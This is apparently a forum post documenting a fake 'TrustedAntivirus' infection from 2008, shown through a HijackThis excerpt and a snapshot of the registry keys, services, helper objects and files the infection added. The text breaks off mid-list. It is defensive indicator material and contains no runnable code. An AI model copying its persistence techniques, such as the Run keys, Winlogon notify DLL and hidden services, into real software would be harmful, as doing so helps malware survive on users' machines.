O4 - HKLM\..\Run: [runner1] C:\WINDOWS\mrofinu1000106.exe 61A847B5BBF72813329B385772FF01F0B3E35B6638993F4661AA4EBD86D67C56389B284534F310
O4 - HKLM\..\Run: [TrustedAntivirus] C:\Program Files\TrustedAntivirus\pgs.exe
O4 - HKLM\..\Run: [ugac] "C:\PROGRA~1\COMMON~1\TRUSTE~1\ugac.exe" -start
O4 - HKLM\..\Run: [bm] "C:\Program Files\Common Files\TrustedAntivirus\bm.exe" dm=http://trustedantivirus.com ad=http://trustedantivirus.com sd=http://ykeeper.trustedantivirus.com
O4 - HKLM\..\Run: [ptask] C:\Program Files\TrustedAntivirus\ptask.exe
O4 - HKLM\..\RunOnce: [overinstall] "C:\Program Files\TrustedAntivirus\pgs.exe" /empty
O4 - Startup: DW_Start.lnk = ?
O20 - Winlogon Notify: fccbbya - C:\WINDOWS\SYSTEM32\fccbbya.dll
O23 - Service: Command Service (cmdService) - Unknown owner - C:\WINDOWS\S0xZ\command.exe
O23 - Service: Network Monitor - Unknown owner - C:\Program Files\Network Monitor\netmon.exe
--
End of file - 5143 bytes
Note: all legitimate entries have been omitted from this HijackThis log; only the entries added by the infection are shown.
Kimberly
Registry.

QUOTE
Keys ignored: 0
---------------
* (none)

Keys added:
---------------
HKEY_CURRENT_USER\Software\Microsoft\Installer
HKEY_CURRENT_USER\Software\Microsoft\Windows Script
HKEY_CURRENT_USER\Software\Microsoft\Windows Script\Settings
HKEY_CURRENT_USER\Software\mozilla.org
HKEY_CURRENT_USER\Software\mozilla.org\Mozilla
HKEY_CURRENT_USER\Software\Opera Software
HKEY_CURRENT_USER\Software\TrustedAntivirus
HKEY_CURRENT_USER\Software\TrustedAntivirus\Settings
HKEY_CLASSES_ROOT\AppID\{EA7522F6-87CF-411e-8A55-19EE4344B676}
HKEY_CLASSES_ROOT\AppID\pblock.DLL
HKEY_CLASSES_ROOT\CLSID\{0EBB0A8F-A20B-445C-9BC2-8D18256AC6BD}
HKEY_CLASSES_ROOT\CLSID\{0EBB0A8F-A20B-445C-9BC2-8D18256AC6BD}\InProcServer32
HKEY_CLASSES_ROOT\CLSID\{22342B44-5B98-4B30-9D53-C182AD8DF217}
HKEY_CLASSES_ROOT\CLSID\{22342B44-5B98-4B30-9D53-C182AD8DF217}\InprocServer32
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Control
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories\{0DE86A52-2BAA-11CF-A229-00AA003D7352}
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories\{0DE86A53-2BAA-11CF-A229-00AA003D7352}
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories\{0DE86A57-2BAA-11CF-A229-00AA003D7352}
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories\{40FC6ED4-2438-11CF-A3DB-080036F12502}
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories\{40FC6ED5-2438-11CF-A3DB-080036F12502}
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\InprocServer32
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\MiscStatus
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\MiscStatus\1
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\ProgID
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Programmable
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\ToolboxBitmap32
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\TypeLib
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Version
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\VersionIndependentProgID
HKEY_CLASSES_ROOT\CLSID\{48E59294-9880-11CF-9754-00AA00C00908}
HKEY_CLASSES_ROOT\CLSID\{48E59294-9880-11CF-9754-00AA00C00908}\InprocServer32
HKEY_CLASSES_ROOT\CLSID\{48E59295-9880-11CF-9754-00AA00C00908}
HKEY_CLASSES_ROOT\CLSID\{48E59295-9880-11CF-9754-00AA00C00908}\InprocServer32
HKEY_CLASSES_ROOT\CLSID\{5C3F6257-3E00-45c2-88D5-CB0F3A17BF0E}
HKEY_CLASSES_ROOT\CLSID\{5C3F6257-3E00-45c2-88D5-CB0F3A17BF0E}\InprocServer32
HKEY_CLASSES_ROOT\CLSID\{5C3F6257-3E00-45c2-88D5-CB0F3A17BF0E}\ProgID
HKEY_CLASSES_ROOT\CLSID\{5C3F6257-3E00-45c2-88D5-CB0F3A17BF0E}\Programmable
HKEY_CLASSES_ROOT\CLSID\{5C3F6257-3E00-45c2-88D5-CB0F3A17BF0E}\TypeLib
HKEY_CLASSES_ROOT\CLSID\{5C3F6257-3E00-45c2-88D5-CB0F3A17BF0E}\VersionIndependentProgID
HKEY_CLASSES_ROOT\CLSID\{6F87F145-DC2D-4766-AF03-3A3B96FFAD98}
HKEY_CLASSES_ROOT\CLSID\{6F87F145-DC2D-4766-AF03-3A3B96FFAD98}\InprocServer32
HKEY_CLASSES_ROOT\CLSID\{6F87F145-DC2D-4766-AF03-3A3B96FFAD98}\ProgID
HKEY_CLASSES_ROOT\CLSID\{6F87F145-DC2D-4766-AF03-3A3B96FFAD98}\Programmable
HKEY_CLASSES_ROOT\CLSID\{6F87F145-DC2D-4766-AF03-3A3B96FFAD98}\TypeLib
HKEY_CLASSES_ROOT\CLSID\{6F87F145-DC2D-4766-AF03-3A3B96FFAD98}\VersionIndependentProgID
HKEY_CLASSES_ROOT\InetCtls.Inet
HKEY_CLASSES_ROOT\InetCtls.Inet\CLSID
HKEY_CLASSES_ROOT\InetCtls.Inet\CurVer
HKEY_CLASSES_ROOT\InetCtls.Inet.1
HKEY_CLASSES_ROOT\InetCtls.Inet.1\CLSID
HKEY_CLASSES_ROOT\Interface\{48E59291-9880-11CF-9754-00AA00C00908}
HKEY_CLASSES_ROOT\Interface\{48E59291-9880-11CF-9754-00AA00C00908}\ProxyStubClsid
HKEY_CLASSES_ROOT\Interface\{48E59291-9880-11CF-9754-00AA00C00908}\ProxyStubClsid32
HKEY_CLASSES_ROOT\Interface\{48E59291-9880-11CF-9754-00AA00C00908}\TypeLib
HKEY_CLASSES_ROOT\Interface\{48E59292-9880-11CF-9754-00AA00C00908}
HKEY_CLASSES_ROOT\Interface\{48E59292-9880-11CF-9754-00AA00C00908}\ProxyStubClsid
HKEY_CLASSES_ROOT\Interface\{48E59292-9880-11CF-9754-00AA00C00908}\ProxyStubClsid32
HKEY_CLASSES_ROOT\Interface\{48E59292-9880-11CF-9754-00AA00C00908}\TypeLib
HKEY_CLASSES_ROOT\PopupBlocker.IEGPB
HKEY_CLASSES_ROOT\PopupBlocker.IEGPB\CLSID
HKEY_CLASSES_ROOT\PopupBlocker.IEGPB\CurVer
HKEY_CLASSES_ROOT\PopupBlocker.IEGPB.1
HKEY_CLASSES_ROOT\PopupBlocker.IEGPB.1\CLSID
HKEY_CLASSES_ROOT\SBIEBHO.IEFW
HKEY_CLASSES_ROOT\SBIEBHO.IEFW\CLSID
HKEY_CLASSES_ROOT\SBIEBHO.IEFW\CurVer
HKEY_CLASSES_ROOT\SBIEBHO.IEFW.2
HKEY_CLASSES_ROOT\SBIEBHO.IEFW.2\CLSID
HKEY_CLASSES_ROOT\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}
HKEY_CLASSES_ROOT\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0
HKEY_CLASSES_ROOT\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0\0
HKEY_CLASSES_ROOT\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0\0\win32
HKEY_CLASSES_ROOT\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0\FLAGS
HKEY_CLASSES_ROOT\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0\HELPDIR
HKEY_CLASSES_ROOT\TypeLib\{D761645B-6B20-4698-AEE8-729981152A82}
HKEY_CLASSES_ROOT\TypeLib\{D761645B-6B20-4698-AEE8-729981152A82}\1.0
HKEY_CLASSES_ROOT\TypeLib\{D761645B-6B20-4698-AEE8-729981152A82}\1.0\0
HKEY_CLASSES_ROOT\TypeLib\{D761645B-6B20-4698-AEE8-729981152A82}\1.0\0\win32
HKEY_CLASSES_ROOT\TypeLib\{D761645B-6B20-4698-AEE8-729981152A82}\1.0\FLAGS
HKEY_CLASSES_ROOT\TypeLib\{D761645B-6B20-4698-AEE8-729981152A82}\1.0\HELPDIR
HKEY_CLASSES_ROOT\TypeLib\{EA7522F6-87CF-411E-8A55-19EE4344B676}
HKEY_CLASSES_ROOT\TypeLib\{EA7522F6-87CF-411E-8A55-19EE4344B676}\1.0
HKEY_CLASSES_ROOT\TypeLib\{EA7522F6-87CF-411E-8A55-19EE4344B676}\1.0\0
HKEY_CLASSES_ROOT\TypeLib\{EA7522F6-87CF-411E-8A55-19EE4344B676}\1.0\0\win32
HKEY_CLASSES_ROOT\TypeLib\{EA7522F6-87CF-411E-8A55-19EE4344B676}\1.0\FLAGS
HKEY_CLASSES_ROOT\TypeLib\{EA7522F6-87CF-411E-8A55-19EE4344B676}\1.0\HELPDIR
HKEY_CLASSES_ROOT\WR
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\24ebc7a7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DownloadManager
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ESENT\Process\ipconfig
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ESENT\Process\ipconfig\DEBUG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0EBB0A8F-A20B-445C-9BC2-8D18256AC6BD}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{22342B44-5B98-4B30-9D53-C182AD8DF217}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{5C3F6257-3E00-45C2-88D5-CB0F3A17BF0E}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{6F87F145-DC2D-4766-AF03-3A3B96FFAD98}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3877C2CD-F137-4144-BDB2-0A811492F920}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A394E835-C8D6-4B4B-884B-D2709059F3BE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Outerinfo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\UAVUN_is1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\fccbbya
HKEY_LOCAL_MACHINE\SOFTWARE\Products
HKEY_LOCAL_MACHINE\SOFTWARE\Rhao
HKEY_LOCAL_MACHINE\SOFTWARE\TrustedAntivirus
HKEY_LOCAL_MACHINE\SOFTWARE\TrustedAntivirus\Settings
HKEY_LOCAL_MACHINE\SOFTWARE\ugac
HKEY_LOCAL_MACHINE\SOFTWARE\xpre
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CMDSERVICE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CMDSERVICE\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CMDSERVICE\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MCHINJDRV
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MCHINJDRV\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MCHINJDRV\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_NETWORK_MONITOR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_NETWORK_MONITOR\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_NETWORK_MONITOR\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\cmdService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\cmdService\Enum
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\cmdService\Security
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\dhlp
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\dhlp\Enum
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\dhlp\Security
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\mchInjDrv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\mchInjDrv\Enum
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Network Monitor
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Network Monitor\Enum
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Network Monitor\Security
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_CMDSERVICE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_CMDSERVICE\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_MCHINJDRV
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_MCHINJDRV\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_NETWORK_MONITOR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_NETWORK_MONITOR\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\cmdService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\cmdService\Security
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\mchInjDrv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Network Monitor
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Network Monitor\Security
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CMDSERVICE
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CMDSERVICE\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CMDSERVICE\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MCHINJDRV
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MCHINJDRV\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MCHINJDRV\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NETWORK_MONITOR
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NETWORK_MONITOR\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NETWORK_MONITOR\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\cmdService
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\cmdService\Enum
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\cmdService\Security
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\dhlp
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\dhlp\Enum
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\dhlp\Security
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mchInjDrv
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mchInjDrv\Enum
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Network Monitor
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Network Monitor\Enum
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Network Monitor\Security


Values added &amp; changed: see the attached file (not reproduced here).

Disk contents.
QUOTE
Drives tracked: 1
-----------------
* c:\

Folders added:
-----------------
c:\Documents and Settings\All Users\Application Data\SalesMon
c:\Documents and Settings\All Users\Application Data\SalesMon\Data
c:\Documents and Settings\All Users\Start Menu\Programs\TrustedAntivirus
c:\Documents and Settings\KLY\Application Data\TrustedAntivirus
c:\Documents and Settings\KLY\Application Data\TrustedAntivirus\Logs
c:\Documents and Settings\KLY\Local Settings\Temp\ICD1.tmp
c:\Documents and Settings\KLY\Local Settings\Temp\NI.UGA6P_0001_N122M2802
c:\Documents and Settings\KLY\Local Settings\Temp\ScnTmp
c:\Documents and Settings\LocalService\Application Data\NetMon
c:\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Internet Explorer
c:\Documents and Settings\NetworkService\Application Data\NetMon
c:\Program Files\Common Files\TrustedAntivirus
c:\Program Files\Network Monitor
c:\Program Files\TrustedAntivirus
c:\Program Files\TrustedAntivirus\Config
c:\Program Files\TrustedAntivirus\Dat
c:\Program Files\TrustedAntivirus\Engines
c:\Program Files\TrustedAntivirus\Engines\AWBase
c:\Program Files\TrustedAntivirus\Engines\AWBase\database
c:\Program Files\TrustedAntivirus\Engines\PGBase
c:\Program Files\TrustedAntivirus\Engines\plugins
c:\Program Files\TrustedAntivirus\Engines\plugins\UpDate
c:\Program Files\TrustedAntivirus\Graphics
c:\Program Files\TrustedAntivirus\LA
c:\Program Files\TrustedAntivirus\Tools
c:\Program Files\TrustedAntivirus\Up
c:\Program Files\TrustedAntivirus\Up\Download
c:\Temp
c:\Temp\1cb
c:\Temp\sanR24
c:\TrustedAntivirus
c:\TrustedAntivirus\AVQuar
c:\WINDOWS\S0xZ
c:\WINDOWS\system32\ax9
c:\WINDOWS\system32\bv2
c:\WINDOWS\system32\ev4
c:\WINDOWS\system32\iDlo01

Files added:
----------------
c:\Documents and Settings\All Users\Desktop\TrustedAntivirus.lnk
Date: 3/6/2008 11:02 PM
Size: 1,599 bytes
c:\Documents and Settings\All Users\Start Menu\Programs\TrustedAntivirus\Contact Customer Support.lnk
Date: 3/6/2008 11:02 PM
Size: 1,567 bytes
c:\Documents and Settings\All Users\Start Menu\Programs\TrustedAntivirus\TrustedAntivirus.lnk
Date: 3/6/2008 11:02 PM
Size: 1,611 bytes
c:\Documents and Settings\All Users\Start Menu\Programs\TrustedAntivirus\Uninstall TrustedAntivirus.lnk
Date: 3/6/2008 11:02 PM
Size: 1,652 bytes
c:\Documents and Settings\KLY\Application Data\TrustedAntivirus\Logs\threats.log
Date: 3/6/2008 11:02 PM
Size: 0 bytes
c:\Documents and Settings\KLY\Application Data\TrustedAntivirus\Logs\update.log
Date: 3/6/2008 11:05 PM
Size: 4,251 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\~DF7077.tmp
Date: 3/6/2008 11:05 PM
Size: 327,680 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\~uavsetup.exe
Date: 3/6/2008 11:01 PM
Size: 15,712,233 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\removalfile.bat
Date: 3/6/2008 10:50 PM
Size: 43 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\sqlite_5J4QbTdgCcOLwo2
Date: 3/6/2008 11:03 PM
Size: 0 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\sqlite_rEvawTY4Fgm0efD
Date: 3/6/2008 11:02 PM
Size: 0 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\yazzsnet.exe
Date: 3/6/2008 10:37 PM
Size: 218,632 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\ICD1.tmp\UGA6P_0001_N122M2802NetInstaller.exe
Date: 2/28/2008 4:57 PM
Size: 185,344 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\ICD1.tmp\UGA6P_0001_N122M2802NetInstaller.inf
Date: 2/28/2008 4:57 PM
Size: 230 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\NI.UGA6P_0001_N122M2802\settings.ini
Date: 3/6/2008 11:03 PM
Size: 23 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\NI.UGA6P_0001_N122M2802\setup.exe
Date: 3/6/2008 11:00 PM
Size: 15,760,928 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\NI.UGA6P_0001_N122M2802\setup.len
Date: 3/6/2008 10:58 PM
Size: 4 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\230H05OX\CA6P2ZCX.HTM
Date: 3/6/2008 10:33 PM
Size: 1,176 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\230H05OX\CASNUHWN.HTM
Date: 3/6/2008 10:44 PM
Size: 1,176 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\230H05OX\serve[1].htm
Date: 3/6/2008 10:31 PM
Size: 945 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\GTCHOJAZ\install_en[1].cab
Date: 3/6/2008 10:44 PM
Size: 102,666 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\GTCHOJAZ\placeholder-1786909-2517323253[1].htm
Date: 3/6/2008 10:31 PM
Size: 1,443 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\GTCHOJAZ\tc2[1].txt
Date: 3/6/2008 11:03 PM
Size: 4,778 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\KLQVS92F\CAF2O7NP.htm
Date: 3/6/2008 10:44 PM
Size: 125 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\KLQVS92F\CASP67K1.htm
Date: 3/6/2008 11:03 PM
Size: 0 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\KLQVS92F\data[1].htm
Date: 3/6/2008 10:44 PM
Size: 25,507 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\KLURCDYF\winavp[1].htm
Date: 3/6/2008 10:45 PM
Size: 502 bytes
c:\Documents and Settings\KLY\Start Menu\Programs\Startup\DW_Start.lnk
Date: 3/6/2008 10:47 PM
Size: 0 bytes
c:\Documents and Settings\LocalService\Application Data\NetMon\domains.txt
Date: 3/6/2008 11:07 PM
Size: 14 bytes
c:\Documents and Settings\LocalService\Application Data\NetMon\log.txt
Date: 3/6/2008 11:07 PM
Size: 372 bytes
c:\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Internet Explorer\MSIMGSIZ.DAT
Date: 3/6/2008 11:03 PM
Size: 16,384 bytes
c:\Documents and Settings\LocalService\Local Settings\History\History.IE5\MSHist012008030620080307\index.dat
Date: 3/6/2008 11:03 PM
Size: 32,768 bytes
c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\1IXK5YVH\march_of_dimes_bg[1].gif
Date: 3/6/2008 11:03 PM
Size: 319 bytes
c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\8XOTC1Z9\command_small[1].gif
Date: 3/6/2008 11:03 PM
Size: 2,417 bytes
c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\8XOTC1Z9\march_of_dimes[1].gif
Date: 3/6/2008 11:03 PM
Size: 24,981 bytes
c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\KFCF67AN\intro[1].htm
Date: 3/6/2008 11:03 PM
Size: 2,317 bytes
c:\Documents and Settings\NetworkService\Application Data\NetMon\domains.txt
Date: 3/6/2008 10:54 PM
Size: 14 bytes
c:\Documents and Settings\NetworkService\Application Data\NetMon\log.txt
Date: 3/6/2008 10:54 PM
Size: 248 bytes
c:\Program Files\Common Files\Yazzle1281OinAdmin.exe
Date: 1/15/2008 10:52 PM
Size: 140,800 bytes
c:\Program Files\Common Files\Yazzle1281OinUninstaller.exe
Date: 3/6/2008 10:50 PM
Size: 41,723 bytes
c:\Program Files\Common Files\TrustedAntivirus\bm.exe
Date: 12/20/2007 8:12 PM
Size: 425,984 bytes
c:\Program Files\Common Files\TrustedAntivirus\ugac.exe
Date: 5/22/2007 1:06 PM
Size: 271,360 bytes
c:\Program Files\Internet Explorer\xabe89104.dll
Date: 2/8/2008 2:07 AM
Size: 217,088 bytes
c:\Program Files\Network Monitor\netmon.exe
Date: 1/4/2006 6:09 PM
Size: 94,208 bytes
c:\Program Files\TrustedAntivirus\Activate.exe
Date: 7/31/2007 8:13 AM
Size: 152,064 bytes
c:\Program Files\TrustedAntivirus\al.dat
Date: 11/7/2007 5:31 PM
Size: 131 bytes
c:\Program Files\TrustedAntivirus\dhlp.dll
Date: 12/6/2007 8:20 PM
Size: 196,608 bytes
c:\Program Files\TrustedAntivirus\FWSettings.bin
Date: 3/6/2008 11:02 PM
Size: 18 bytes
c:\Program Files\TrustedAntivirus\history.db
Date: 3/6/2008 11:03 PM
Size: 23,552 bytes
c:\Program Files\TrustedAntivirus\main.log
Date: 3/6/2008 11:03 PM
Size: 790 bytes
c:\Program Files\TrustedAntivirus\pgs.exe
Date: 12/7/2007 11:03 AM
Size: 2,097,152 bytes
c:\Program Files\TrustedAntivirus\ptask.exe
Date: 11/27/2007 5:31 PM
Size: 28,672 bytes
c:\Program Files\TrustedAntivirus\reload.exe
Date: 11/27/2007 5:31 PM
Size: 161,792 bytes
c:\Program Files\TrustedAntivirus\ResErrors.log
Date: 3/6/2008 11:08 PM
Size: 84,524 bytes
c:\Program Files\TrustedAntivirus\scnkrnl.dll
Date: 11/27/2007 5:29 PM
Size: 569,344 bytes
c:\Program Files\TrustedAntivirus\settings.ini
Date: 3/6/2008 11:02 PM
Size: 1,641 bytes
c:\Program Files\TrustedAntivirus\sqlite3.dll
Date: 8/9/2006 10:29 AM
Size: 247,232 bytes
c:\Program Files\TrustedAntivirus\sr.log
Date: 3/6/2008 11:02 PM
Size: 232 bytes
c:\Program Files\TrustedAntivirus\unins000.dat
Date: 3/6/2008 11:02 PM
Size: 33,887 bytes
c:\Program Files\TrustedAntivirus\unins000.exe
Date: 3/6/2008 11:01 PM
Size: 682,364 bytes
c:\Program Files\TrustedAntivirus\Config\pgs.xml
Date: 3/6/2008 11:01 PM
Size: 8,819,841 bytes
c:\Program Files\TrustedAntivirus\Dat\Activate.dat
Date: 3/6/2008 11:02 PM
Size: 314 bytes
c:\Program Files\TrustedAntivirus\Dat\BkSites.dat
Date: 10/31/2007 12:20 PM
Size: 283,541 bytes
c:\Program Files\TrustedAntivirus\Dat\bnlink.dat
Date: 3/6/2008 11:02 PM
Size: 220 bytes
c:\Program Files\TrustedAntivirus\Dat\cd.dat
Date: 11/14/2007 11:15 AM
Size: 119 bytes
c:\Program Files\TrustedAntivirus\Dat\incmp.dat
Date: 4/5/2006 10:00 AM
Size: 129 bytes
c:\Program Files\TrustedAntivirus\Dat\index.dat
Date: 12/14/2006 3:17 PM
Size: 6 bytes
c:\Program Files\TrustedAntivirus\Dat\pv.dat
Date: 3/6/2008 11:02 PM
Size: 9 bytes
c:\Program Files\TrustedAntivirus\Engines\AWBase\vbpv.dat
Date: 7/13/2007 11:12 AM
Size: 10 bytes
c:\Program Files\TrustedAntivirus\Engines\AWBase\database\enemies.dat
Date: 7/13/2007 11:09 AM
Size: 11,642,713 bytes
c:\Program Files\TrustedAntivirus\Engines\PGBase\vbpv.dat
Date: 8/1/2005 3:42 PM
Size: 8 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\BORLNDMM.DLL
Date: 5/8/2007 12:10 PM
Size: 22,528 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANADWR.DLL
Date: 5/8/2007 11:58 AM
Size: 246,310 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANBCDR.DLL
Date: 5/8/2007 11:59 AM
Size: 913,355 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANDLDR.DLL
Date: 5/8/2007 12:00 PM
Size: 1,123,285 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANDOS1.DLL
Date: 5/8/2007 12:02 PM
Size: 1,265,683 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANEMUL.DLL
Date: 5/8/2007 12:02 PM
Size: 28,301 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANFUNC.DLL
